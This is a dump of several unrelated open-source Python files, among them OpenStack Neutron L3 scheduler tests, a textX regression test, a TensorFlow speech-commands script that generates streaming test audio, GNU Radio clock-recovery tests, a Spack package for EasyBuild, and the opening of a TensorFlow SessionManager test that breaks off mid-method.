        router = self._create_ha_router()
        self.plugin.auto_schedule_routers(
            self.adminContext, self.agent1.host, None)
        self.plugin.auto_schedule_routers(
            self.adminContext, self.agent2.host, None)
        agents = self.plugin.get_l3_agents_hosting_routers(
            self.adminContext, [router['id']])
        self.assertEqual(2, len(agents))

    def test_auto_schedule_specific_router_when_agent_added(self):
        self._auto_schedule_when_agent_added(True)

    def test_auto_schedule_all_routers_when_agent_added(self):
        self._auto_schedule_when_agent_added(False)

    def _auto_schedule_when_agent_added(self, specific_router):
        router = self._create_ha_router()
        self.plugin.schedule_router(self.adminContext, router['id'])
        agents = self.plugin.get_l3_agents_hosting_routers(
            self.adminContext, [router['id']],
            admin_state_up=True)
        self.assertEqual(2, len(agents))
        agent_ids = [agent['id'] for agent in agents]
        self.assertIn(self.agent_id1, agent_ids)
        self.assertIn(self.agent_id2, agent_ids)

        # A third agent appears; auto-scheduling must extend the HA router
        # to it (either by explicit id or by scheduling "all").
        agent = helpers.register_l3_agent(host='host_3')
        self.agent_id3 = agent.id
        routers_to_auto_schedule = [router['id']] if specific_router else []
        self.plugin.auto_schedule_routers(self.adminContext,
                                          'host_3',
                                          routers_to_auto_schedule)

        agents = self.plugin.get_l3_agents_hosting_routers(
            self.adminContext, [router['id']],
            admin_state_up=True)
        self.assertEqual(3, len(agents))

        # Simulate agent restart to make sure we don't try to re-bind
        self.plugin.auto_schedule_routers(self.adminContext,
                                          'host_3',
                                          routers_to_auto_schedule)

    def test_scheduler_with_ha_enabled_not_enough_agent(self):
        r1 = self._create_ha_router()
        self.plugin.schedule_router(self.adminContext, r1['id'])
        agents = self.plugin.get_l3_agents_hosting_routers(
            self.adminContext, [r1['id']],
            admin_state_up=True)
        self.assertEqual(2, len(agents))

        # With only one agent admin-up, an HA router cannot be scheduled.
        r2 = self._create_ha_router()
        self._set_l3_agent_admin_state(self.adminContext,
                                       self.agent_id2, False)
        self.plugin.schedule_router(self.adminContext, r2['id'])
        agents = self.plugin.get_l3_agents_hosting_routers(
            self.adminContext, [r2['id']],
            admin_state_up=True)
        self.assertEqual(0, len(agents))

        self._set_l3_agent_admin_state(self.adminContext,
                                       self.agent_id2, True)
class L3HALeastRoutersSchedulerTestCase(L3HATestCaseMixin):
    """LeastRoutersScheduler behavior for HA routers."""

    def _register_l3_agents(self, plugin=None):
        # Four agents total: host_1/host_2 from the mixin plus two more.
        super(L3HALeastRoutersSchedulerTestCase,
              self)._register_l3_agents(plugin=plugin)
        agent = helpers.register_l3_agent(host='host_3')
        self.agent_id3 = agent.id
        agent = helpers.register_l3_agent(host='host_4')
        self.agent_id4 = agent.id

    def setUp(self):
        super(L3HALeastRoutersSchedulerTestCase, self).setUp()
        self.plugin.router_scheduler = importutils.import_object(
            'neutron.scheduler.l3_agent_scheduler.LeastRoutersScheduler'
        )

    def test_scheduler(self):
        cfg.CONF.set_override('max_l3_agents_per_router', 2)

        # disable the third and fourth agents to be sure that the router
        # will be scheduled to the first two
        self._set_l3_agent_admin_state(self.adminContext,
                                       self.agent_id3, False)
        self._set_l3_agent_admin_state(self.adminContext,
                                       self.agent_id4, False)
        r1 = self._create_ha_router()
        self.plugin.schedule_router(self.adminContext, r1['id'])
        agents = self.plugin.get_l3_agents_hosting_routers(
            self.adminContext, [r1['id']],
            admin_state_up=True)
        self.assertEqual(2, len(agents))
        agent_ids = [agent['id'] for agent in agents]
        self.assertIn(self.agent_id1, agent_ids)
        self.assertIn(self.agent_id2, agent_ids)

        # Re-enable agents 3 and 4: now the least-loaded agents, so the
        # next HA router must land on them.
        self._set_l3_agent_admin_state(self.adminContext,
                                       self.agent_id3, True)
        self._set_l3_agent_admin_state(self.adminContext,
                                       self.agent_id4, True)

        r2 = self._create_ha_router()
        self.plugin.schedule_router(self.adminContext, r2['id'])
        agents = self.plugin.get_l3_agents_hosting_routers(
            self.adminContext, [r2['id']],
            admin_state_up=True)
        self.assertEqual(2, len(agents))
        agent_ids = [agent['id'] for agent in agents]
        self.assertIn(self.agent_id3, agent_ids)
        self.assertIn(self.agent_id4, agent_ids)
class TestGetL3AgentsWithAgentModeFilter(testlib_api.SqlTestCase,
                                         L3SchedulerBaseMixin):
    """Test cases to test get_l3_agents.

    This class tests the L3AgentSchedulerDbMixin.get_l3_agents()
    for the 'agent_mode' filter with various values.

    5 l3 agents are registered in the order - legacy, dvr_snat, dvr, fake_mode
    and legacy
    """

    # Scenario data (testscenarios-style): 'agent_modes' is the filter
    # input, 'expected_agent_modes' the modes of the agents returned, in
    # registration order.
    scenarios = [
        ('no filter',
         dict(agent_modes=[],
              expected_agent_modes=['legacy', 'dvr_snat', 'dvr',
                                    'fake_mode', 'legacy'])),

        ('legacy',
         dict(agent_modes=['legacy'],
              expected_agent_modes=['legacy', 'legacy'])),

        ('dvr_snat',
         dict(agent_modes=['dvr_snat'],
              expected_agent_modes=['dvr_snat'])),

        ('dvr ',
         dict(agent_modes=['dvr'],
              expected_agent_modes=['dvr'])),

        ('legacy and dvr snat',
         dict(agent_modes=['legacy', 'dvr_snat', 'legacy'],
              expected_agent_modes=['legacy', 'dvr_snat', 'legacy'])),

        ('legacy and dvr',
         dict(agent_modes=['legacy', 'dvr'],
              expected_agent_modes=['legacy', 'dvr', 'legacy'])),

        ('dvr_snat and dvr',
         dict(agent_modes=['dvr_snat', 'dvr'],
              expected_agent_modes=['dvr_snat', 'dvr'])),

        ('legacy, dvr_snat and dvr',
         dict(agent_modes=['legacy', 'dvr_snat', 'dvr'],
              expected_agent_modes=['legacy', 'dvr_snat', 'dvr',
                                    'legacy'])),

        ('invalid',
         dict(agent_modes=['invalid'],
              expected_agent_modes=[])),
    ]

    def setUp(self):
        super(TestGetL3AgentsWithAgentModeFilter, self).setUp()
        self.plugin = L3HAPlugin()
        self.setup_coreplugin('neutron.plugins.ml2.plugin.Ml2Plugin')
        self.adminContext = n_context.get_admin_context()
        hosts = ['host_1', 'host_2', 'host_3', 'host_4', 'host_5']
        agent_modes = ['legacy', 'dvr_snat', 'dvr', 'fake_mode', 'legacy']
        for host, agent_mode in zip(hosts, agent_modes):
            helpers.register_l3_agent(host, agent_mode)

    def _get_agent_mode(self, agent):
        # Agent mode lives in the agent's serialized configuration blob.
        agent_conf = self.plugin.get_configuration_dict(agent)
        return agent_conf.get('agent_mode', 'None')

    def test_get_l3_agents(self):
        l3_agents = self.plugin.get_l3_agents(
            self.adminContext, filters={'agent_modes': self.agent_modes})
        self.assertEqual(len(self.expected_agent_modes), len(l3_agents))
        returned_agent_modes = [self._get_agent_mode(agent)
                                for agent in l3_agents]
        self.assertEqual(self.expected_agent_modes, returned_agent_modes)
|
apache-2.0
|
igordejanovic/textX
|
tests/functional/regressions/test_issue_80_object_processors.py
|
1
|
1738
|
from __future__ import unicode_literals
from textx.metamodel import metamodel_from_str
call_counter = 0
grammar1 = """
foo:
'foo' m_formula = Formula
;
Formula:
( values=FormulaExpression values='+' ( values=FormulaExpression)* )
;
FormulaExpression:
values=bar
;
bar:
m_id=/[a-f0-9]+/
;
"""
grammar2 = u"""
foo:
'foo' m_formula = Formula
;
Formula:
( values=FormulaExpression ( values=FormulaExpression)* )
;
FormulaExpression:
values=bar
;
bar:
m_id=/[a-f0-9]+/
;
"""
grammar3 = u"""
foo:
'foo' m_formula = Formula
;
Formula:
( values=FormulaExpression values='+' ( values=FormulaExpression)* )
;
FormulaExpression:
values=/[a-f0-9]+/
;
"""
def default_processor(obj):
    """Object processor shared by all rules: count the call and log the
    class of the object being processed."""
    global call_counter
    call_counter = call_counter + 1
    print("PROCESSING " + str(type(obj).__name__))
def parse_str(grammar, lola_str):
    """Parse *lola_str* with a metamodel built from *grammar*.

    Registers ``default_processor`` as the object processor for every
    rule, so each constructed object increments the module-level
    ``call_counter``.

    Returns the parsed model.
    """
    # NOTE: the original `lola_str = lola_str` no-op was removed.
    obj_processors = {
        "foo": default_processor,
        "Formula": default_processor,
        "FormulaExpression": default_processor,
        "bar": default_processor,
    }
    meta_model = metamodel_from_str(grammar, ignore_case=True,
                                    auto_init_attributes=False)
    meta_model.register_obj_processors(obj_processors)
    return meta_model.model_from_str(lola_str)
def test_issue_80_object_processors():
    """Regression test for textX issue #80: the object processor must
    fire exactly once per constructed object, for every grammar shape."""
    global call_counter
    # grammar1: foo + Formula + 2 x (FormulaExpression + bar) = 6 objects.
    test_str = "foo a323 + a111"
    call_counter = 0
    parse_str(grammar1, test_str)
    assert call_counter == 6
    # grammar2: same object count without the '+' separator.
    test_str = "foo a323 a111"
    call_counter = 0
    parse_str(grammar2, test_str)
    assert call_counter == 6
    # grammar3: no 'bar' objects, so only 4 objects are created.
    test_str = "foo a323 + a111"
    call_counter = 0
    parse_str(grammar3, test_str)
    assert call_counter == 4
|
mit
|
ppwwyyxx/tensorflow
|
tensorflow/examples/speech_commands/generate_streaming_test_wav.py
|
23
|
11074
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Saves out a .wav file with synthesized conversational data and labels.
The best way to estimate the real-world performance of an audio recognition
model is by running it against a continuous stream of data, the way that it
would be used in an application. Training evaluations are only run against
discrete individual samples, so the results aren't as realistic.
To make it easy to run evaluations against audio streams, this script uses
samples from the testing partition of the data set, mixes them in at random
positions together with background noise, and saves out the result as one long
audio file.
Here's an example of generating a test file:
bazel run tensorflow/examples/speech_commands:generate_streaming_test_wav -- \
--data_dir=/tmp/my_wavs --background_dir=/tmp/my_backgrounds \
--background_volume=0.1 --test_duration_seconds=600 \
--output_audio_file=/tmp/streaming_test.wav \
--output_labels_file=/tmp/streaming_test_labels.txt
Once you've created a streaming audio file, you can then use the
test_streaming_accuracy tool to calculate accuracy metrics for a model.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import math
import sys
import numpy as np
import tensorflow as tf
import input_data
import models
FLAGS = None
def mix_in_audio_sample(track_data, track_offset, sample_data, sample_offset,
                        clip_duration, sample_volume, ramp_in, ramp_out):
  """Mixes the sample data into the main track at the specified offset.

  Args:
    track_data: Numpy array holding main audio data. Modified in-place.
    track_offset: Where to mix the sample into the main track.
    sample_data: Numpy array of audio data to mix into the main track.
    sample_offset: Where to start in the audio sample.
    clip_duration: How long the sample segment is.
    sample_volume: Loudness to mix the sample in at.
    ramp_in: Length in samples of volume increase stage.
    ramp_out: Length in samples of volume decrease stage.
  """
  fade_out_start = clip_duration - ramp_out
  # Clamp the mixed region so it fits inside both the track and the sample.
  end_in_track = min(track_offset + clip_duration,
                     track_data.shape[0],
                     track_offset + (sample_data.shape[0] - sample_offset))
  for i in range(end_in_track - track_offset):
    # Piecewise linear envelope: ramp up, hold at 1, ramp down.
    if i < ramp_in:
      envelope = i / ramp_in
    elif i > fade_out_start:
      envelope = (clip_duration - i) / ramp_out
    else:
      envelope = 1
    track_data[track_offset + i] += (
        sample_data[sample_offset + i] * envelope * sample_volume)
def main(_):
  """Builds a long streaming-test wav plus a matching ground-truth label file.

  Fills a `test_duration_seconds`-long track with overlapping, crossfaded
  background-noise segments, mixes randomly chosen test-partition word clips
  in at jittered offsets, then writes the audio to `output_audio_file` and
  "label, time_ms" lines to `output_labels_file`.
  """
  words_list = input_data.prepare_words_list(FLAGS.wanted_words.split(','))
  model_settings = models.prepare_model_settings(
      len(words_list), FLAGS.sample_rate, FLAGS.clip_duration_ms,
      FLAGS.window_size_ms, FLAGS.window_stride_ms, FLAGS.feature_bin_count,
      'mfcc')
  audio_processor = input_data.AudioProcessor(
      '', FLAGS.data_dir, FLAGS.silence_percentage, 10,
      FLAGS.wanted_words.split(','), FLAGS.validation_percentage,
      FLAGS.testing_percentage, model_settings, FLAGS.data_dir)
  output_audio_sample_count = FLAGS.sample_rate * FLAGS.test_duration_seconds
  output_audio = np.zeros((output_audio_sample_count,), dtype=np.float32)
  # Set up background audio.
  # Each background segment is one clip long plus a crossover margin, and
  # segments are striped one clip apart, so consecutive segments overlap and
  # crossfade over `background_crossover_ms`.
  background_crossover_ms = 500
  background_segment_duration_ms = (
      FLAGS.clip_duration_ms + background_crossover_ms)
  background_segment_duration_samples = int(
      (background_segment_duration_ms * FLAGS.sample_rate) / 1000)
  background_segment_stride_samples = int(
      (FLAGS.clip_duration_ms * FLAGS.sample_rate) / 1000)
  background_ramp_samples = int(
      ((background_crossover_ms / 2) * FLAGS.sample_rate) / 1000)
  # Mix the background audio into the main track.
  how_many_backgrounds = int(
      math.ceil(output_audio_sample_count / background_segment_stride_samples))
  for i in range(how_many_backgrounds):
    output_offset = int(i * background_segment_stride_samples)
    background_index = np.random.randint(len(audio_processor.background_data))
    background_samples = audio_processor.background_data[background_index]
    # NOTE(review): assumes every background clip is longer than
    # model_settings['desired_samples']; a shorter clip would make this
    # randint call raise — confirm against the background data loader.
    background_offset = np.random.randint(
        0, len(background_samples) - model_settings['desired_samples'])
    background_volume = np.random.uniform(0, FLAGS.background_volume)
    mix_in_audio_sample(output_audio, output_offset, background_samples,
                        background_offset, background_segment_duration_samples,
                        background_volume, background_ramp_samples,
                        background_ramp_samples)
  # Mix the words into the main track, noting their labels and positions.
  output_labels = []
  word_stride_ms = FLAGS.clip_duration_ms + FLAGS.word_gap_ms
  word_stride_samples = int((word_stride_ms * FLAGS.sample_rate) / 1000)
  clip_duration_samples = int(
      (FLAGS.clip_duration_ms * FLAGS.sample_rate) / 1000)
  word_gap_samples = int((FLAGS.word_gap_ms * FLAGS.sample_rate) / 1000)
  how_many_words = int(
      math.floor(output_audio_sample_count / word_stride_samples))
  all_test_data, all_test_labels = audio_processor.get_unprocessed_data(
      -1, model_settings, 'testing')
  for i in range(how_many_words):
    # Jitter each word's position by up to one gap within its stride slot.
    output_offset = (
        int(i * word_stride_samples) + np.random.randint(word_gap_samples))
    output_offset_ms = (output_offset * 1000) / FLAGS.sample_rate
    is_unknown = np.random.randint(100) < FLAGS.unknown_percentage
    if is_unknown:
      wanted_label = input_data.UNKNOWN_WORD_LABEL
    else:
      # Skips the first two list entries — presumably the silence/unknown
      # labels prepended by prepare_words_list; TODO confirm.
      wanted_label = words_list[2 + np.random.randint(len(words_list) - 2)]
    test_data_start = np.random.randint(len(all_test_data))
    found_sample_data = None
    index_lookup = np.arange(len(all_test_data), dtype=np.int32)
    np.random.shuffle(index_lookup)
    # Scan the shuffled test set from a random start until a clip with the
    # wanted label turns up.
    for test_data_offset in range(len(all_test_data)):
      test_data_index = index_lookup[(
          test_data_start + test_data_offset) % len(all_test_data)]
      current_label = all_test_labels[test_data_index]
      if current_label == wanted_label:
        found_sample_data = all_test_data[test_data_index]
        break
    # NOTE(review): if no clip with the wanted label exists in the test set,
    # found_sample_data stays None and mix_in_audio_sample will fail.
    mix_in_audio_sample(output_audio, output_offset, found_sample_data, 0,
                        clip_duration_samples, 1.0, 500, 500)
    output_labels.append({'label': wanted_label, 'time': output_offset_ms})
  input_data.save_wav_file(FLAGS.output_audio_file, output_audio,
                           FLAGS.sample_rate)
  tf.compat.v1.logging.info('Saved streaming test wav to %s',
                            FLAGS.output_audio_file)
  with open(FLAGS.output_labels_file, 'w') as f:
    for output_label in output_labels:
      f.write('%s, %f\n' % (output_label['label'], output_label['time']))
  tf.compat.v1.logging.info('Saved streaming test labels to %s',
                            FLAGS.output_labels_file)
if __name__ == '__main__':
  # Command-line flags. Unrecognized arguments are passed through to app.run
  # so absl/TF flags can consume them.
  parser = argparse.ArgumentParser()
  parser.add_argument(
      '--data_url',
      type=str,
      # pylint: disable=line-too-long
      default='https://storage.googleapis.com/download.tensorflow.org/data/speech_commands_v0.01.tar.gz',
      # pylint: enable=line-too-long
      help='Location of speech training data')
  parser.add_argument(
      '--data_dir',
      type=str,
      default='/tmp/speech_dataset',
      help="""\
      Where to download the speech training data to.
      """)
  parser.add_argument(
      '--background_dir',
      type=str,
      default='',
      help="""\
      Path to a directory of .wav files to mix in as background noise during training.
      """)
  parser.add_argument(
      '--background_volume',
      type=float,
      default=0.1,
      help="""\
      How loud the background noise should be, between 0 and 1.
      """)
  parser.add_argument(
      '--background_frequency',
      type=float,
      default=0.8,
      help="""\
      How many of the training samples have background noise mixed in.
      """)
  parser.add_argument(
      '--silence_percentage',
      type=float,
      default=10.0,
      help="""\
      How much of the training data should be silence.
      """)
  parser.add_argument(
      '--testing_percentage',
      type=int,
      default=10,
      help='What percentage of wavs to use as a test set.')
  parser.add_argument(
      '--validation_percentage',
      type=int,
      default=10,
      help='What percentage of wavs to use as a validation set.')
  parser.add_argument(
      '--sample_rate',
      type=int,
      default=16000,
      help='Expected sample rate of the wavs.',)
  parser.add_argument(
      '--clip_duration_ms',
      type=int,
      default=1000,
      help='Expected duration in milliseconds of the wavs.',)
  parser.add_argument(
      '--window_size_ms',
      type=float,
      default=30.0,
      help='How long each spectrogram timeslice is',)
  parser.add_argument(
      '--window_stride_ms',
      type=float,
      default=10.0,
      help='How long the stride is between spectrogram timeslices',)
  parser.add_argument(
      '--feature_bin_count',
      type=int,
      default=40,
      help='How many bins to use for the MFCC fingerprint',
  )
  parser.add_argument(
      '--wanted_words',
      type=str,
      default='yes,no,up,down,left,right,on,off,stop,go',
      help='Words to use (others will be added to an unknown label)',)
  parser.add_argument(
      '--output_audio_file',
      type=str,
      default='/tmp/speech_commands_train/streaming_test.wav',
      help='File to save the generated test audio to.')
  parser.add_argument(
      '--output_labels_file',
      type=str,
      default='/tmp/speech_commands_train/streaming_test_labels.txt',
      help='File to save the generated test labels to.')
  parser.add_argument(
      '--test_duration_seconds',
      type=int,
      default=600,
      help='How long the generated test audio file should be.',)
  parser.add_argument(
      '--word_gap_ms',
      type=int,
      default=2000,
      help='How long the average gap should be between words.',)
  parser.add_argument(
      '--unknown_percentage',
      type=int,
      default=30,
      help='What percentage of words should be unknown.')
  FLAGS, unparsed = parser.parse_known_args()
  tf.compat.v1.app.run(main=main, argv=[sys.argv[0]] + unparsed)
|
apache-2.0
|
pothosware/gnuradio
|
gr-digital/python/digital/qa_clock_recovery_mm.py
|
45
|
5378
|
#!/usr/bin/env python
#
# Copyright 2011-2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import random
import cmath
from gnuradio import gr, gr_unittest, digital, blocks
class test_clock_recovery_mm(gr_unittest.TestCase):
    """QA for the Mueller and Muller clock recovery blocks.

    Each test drives a clock_recovery_mm block with a known waveform and
    compares only the tail of the output, after the recovery loop has had
    time to converge past its acquisition transient.
    """

    def setUp(self):
        self.tb = gr.top_block()

    def tearDown(self):
        self.tb = None

    def _run_recovery(self, is_complex, params, data, expected, ncmp, places):
        """Run a clock_recovery_mm block over `data` and check the output tail.

        The four original tests were copy-paste duplicates of this flow;
        factoring it out keeps the parameters of each case visible at a
        glance.

        Args:
            is_complex: use the cc variant (complex src/snk) if True,
                otherwise the ff variant.
            params: (omega, gain_omega, mu, gain_mu, omega_relative_limit)
                passed straight to the block constructor.
            data: input samples, fed once (no repeat).
            expected: full-length expected output; only the last `ncmp`
                samples are compared, to skip the acquisition transient.
            ncmp: number of trailing samples to compare.
            places: decimal places for the almost-equal comparison.
        """
        if is_complex:
            recovery = digital.clock_recovery_mm_cc(*params)
            src = blocks.vector_source_c(data, False)
            snk = blocks.vector_sink_c()
            compare = self.assertComplexTuplesAlmostEqual
        else:
            recovery = digital.clock_recovery_mm_ff(*params)
            src = blocks.vector_source_f(data, False)
            snk = blocks.vector_sink_f()
            compare = self.assertFloatTuplesAlmostEqual
        self.tb.connect(src, recovery, snk)
        self.tb.run()
        compare(expected[-ncmp:], snk.data()[-ncmp:], places)

    def test01(self):
        # Complex/complex version, constant input.
        # Output settles just shy of 1.0, hence the 0.99972 expectation.
        self._run_recovery(
            True, (2, 0.001, 0.5, 0.01, 0.001),
            100 * [complex(1, 1)],
            100 * [complex(0.99972, 0.99972)],
            30, 5)

    def test02(self):
        # Float/float version, constant input.
        self._run_recovery(
            False, (2, 0.01, 0.5, 0.01, 0.001),
            100 * [1],
            100 * [0.9997],
            30, 4)

    def test03(self):
        # Complex/complex version with an alternating +/- input.
        self._run_recovery(
            True, (2, 0.01, 0.25, 0.01, 0.0001),
            1000 * [complex(1, 1), complex(1, 1),
                    complex(-1, -1), complex(-1, -1)],
            1000 * [complex(-1.2, -1.2), complex(1.2, 1.2)],
            100, 1)

    def test04(self):
        # Float/float version with an alternating +/- input.
        self._run_recovery(
            False, (2, 0.01, 0.25, 0.1, 0.001),
            1000 * [1, 1, -1, -1],
            1000 * [-1.2, 1.2],
            100, 1)
if __name__ == '__main__':
    # Run the QA suite, writing an XML report for the build system.
    gr_unittest.run(test_clock_recovery_mm, "test_clock_recovery_mm.xml")
|
gpl-3.0
|
TheTimmy/spack
|
var/spack/repos/builtin/packages/easybuild/package.py
|
3
|
1703
|
##############################################################################
# Copyright (c) 2017, Kenneth Hoste
#
# This file is part of Spack.
# Created by Kenneth Hoste, [email protected]
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Easybuild(PythonPackage):
    """EasyBuild is a software build and installation framework
    for (scientific) software on HPC systems.
    """
    homepage = 'http://hpcugent.github.io/easybuild/'
    url = 'https://pypi.io/packages/source/e/easybuild/easybuild-3.1.2.tar.gz'
    # Second argument is the md5 checksum of the 3.1.2 source tarball.
    version('3.1.2', 'c2d901c2a71f51b24890fa69c3a46383')
    # EasyBuild itself is a thin meta-package: the functionality lives in the
    # framework/easyblocks/easyconfigs components, pinned to matching versions
    # and needed only at run time.
    depends_on('[email protected]', when='@3.1.2', type='run')
    depends_on('[email protected]', when='@3.1.2', type='run')
    depends_on('[email protected]', when='@3.1.2', type='run')
|
lgpl-2.1
|
apark263/tensorflow
|
tensorflow/python/training/session_manager_test.py
|
11
|
33665
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SessionManager."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.python.client import session as session_lib
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.training import checkpoint_management
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training import server_lib
from tensorflow.python.training import session_manager
class SessionManagerTest(test.TestCase):
def testPrepareSessionSucceeds(self):
with ops.Graph().as_default():
v = variables.VariableV1([1.0, 2.0, 3.0], name="v")
sm = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
sess = sm.prepare_session(
"", init_op=variables.global_variables_initializer())
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
def testPrepareSessionSucceedsWithInitFeedDict(self):
with ops.Graph().as_default():
p = array_ops.placeholder(dtypes.float32, shape=(3,))
v = variables.VariableV1(p, name="v")
sm = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
sess = sm.prepare_session(
"",
init_op=variables.global_variables_initializer(),
init_feed_dict={p: [1.0, 2.0, 3.0]})
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
def testPrepareSessionSucceedsWithInitFn(self):
with ops.Graph().as_default():
v = variables.VariableV1([125], name="v")
sm = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
sess = sm.prepare_session(
"", init_fn=lambda sess: sess.run(v.initializer))
self.assertAllClose([125], sess.run(v))
@test_util.run_v1_only("b/120545219")
def testPrepareSessionFails(self):
checkpoint_dir = os.path.join(self.get_temp_dir(), "prepare_session")
checkpoint_dir2 = os.path.join(self.get_temp_dir(), "prepare_session2")
try:
gfile.DeleteRecursively(checkpoint_dir)
gfile.DeleteRecursively(checkpoint_dir2)
except errors.OpError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with ops.Graph().as_default():
v = variables.VariableV1([1.0, 2.0, 3.0], name="v")
sm = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
saver = saver_lib.Saver({"v": v})
sess = sm.prepare_session(
"",
init_op=variables.global_variables_initializer(),
saver=saver,
checkpoint_dir=checkpoint_dir)
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
checkpoint_filename = os.path.join(checkpoint_dir,
"prepare_session_checkpoint")
saver.save(sess, checkpoint_filename)
# Create a new Graph and SessionManager and recover.
with ops.Graph().as_default():
# Renames the checkpoint directory.
os.rename(checkpoint_dir, checkpoint_dir2)
gfile.MakeDirs(checkpoint_dir)
v = variables.VariableV1([6.0, 7.0, 8.0], name="v")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
saver = saver_lib.Saver({"v": v})
# This should fail as there's no checkpoint within 2 seconds.
with self.assertRaisesRegexp(
RuntimeError, "no init_op or init_fn or local_init_op was given"):
sess = sm.prepare_session(
"",
init_op=None,
saver=saver,
checkpoint_dir=checkpoint_dir,
wait_for_checkpoint=True,
max_wait_secs=2)
# Rename the checkpoint directory back.
gfile.DeleteRecursively(checkpoint_dir)
os.rename(checkpoint_dir2, checkpoint_dir)
# This should succeed as there's checkpoint.
sess = sm.prepare_session(
"",
init_op=None,
saver=saver,
checkpoint_dir=checkpoint_dir,
wait_for_checkpoint=True,
max_wait_secs=2)
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
  def _test_recovered_variable(self,
                               checkpoint_dir=None,
                               checkpoint_filename_with_path=None):
    """Recovers v from a checkpoint (by dir or explicit path) and checks it.

    Expects a checkpoint written by testRecoverSession in which v == 1.
    Passing both location arguments is expected to raise ValueError inside
    recover_session.
    """
    # Create a new Graph and SessionManager and recover from a checkpoint.
    with ops.Graph().as_default():
      v = variables.VariableV1(2, name="v")
      with session_lib.Session():
        self.assertEqual(False, variables.is_variable_initialized(v).eval())
      sm2 = session_manager.SessionManager(
          ready_op=variables.report_uninitialized_variables())
      saver = saver_lib.Saver({"v": v})
      sess, initialized = sm2.recover_session(
          "",
          saver=saver,
          checkpoint_dir=checkpoint_dir,
          checkpoint_filename_with_path=checkpoint_filename_with_path)
      self.assertTrue(initialized)
      self.assertEqual(
          True,
          variables.is_variable_initialized(
              sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
      # The checkpointed value (1), not the initial value (2), must win.
      self.assertEquals(1, sess.run(v))

  @test_util.run_v1_only("b/120545219")
  def testRecoverSession(self):
    # Create a checkpoint.
    checkpoint_dir = os.path.join(self.get_temp_dir(), "recover_session")
    try:
      gfile.DeleteRecursively(checkpoint_dir)
    except errors.OpError:
      pass  # Ignore
    gfile.MakeDirs(checkpoint_dir)
    with ops.Graph().as_default():
      v = variables.VariableV1(1, name="v")
      sm = session_manager.SessionManager(
          ready_op=variables.report_uninitialized_variables())
      saver = saver_lib.Saver({"v": v})
      # With no checkpoint on disk yet, recovery reports initialized=False.
      sess, initialized = sm.recover_session(
          "", saver=saver, checkpoint_dir=checkpoint_dir)
      self.assertFalse(initialized)
      sess.run(v.initializer)
      self.assertEquals(1, sess.run(v))
      saver.save(sess,
                 os.path.join(checkpoint_dir, "recover_session_checkpoint"))
    # Recovery must work both from a directory and from an explicit file path.
    self._test_recovered_variable(checkpoint_dir=checkpoint_dir)
    self._test_recovered_variable(
        checkpoint_filename_with_path=checkpoint_management.latest_checkpoint(
            checkpoint_dir))
    # Cannot set both checkpoint_dir and checkpoint_filename_with_path.
    with self.assertRaises(ValueError):
      self._test_recovered_variable(
          checkpoint_dir=checkpoint_dir,
          checkpoint_filename_with_path=checkpoint_management.latest_checkpoint(
              checkpoint_dir))
@test_util.run_v1_only("b/120545219")
def testWaitForSessionReturnsNoneAfterTimeout(self):
with ops.Graph().as_default():
variables.VariableV1(1, name="v")
sm = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables(),
recovery_wait_secs=1)
# Set max_wait_secs to allow us to try a few times.
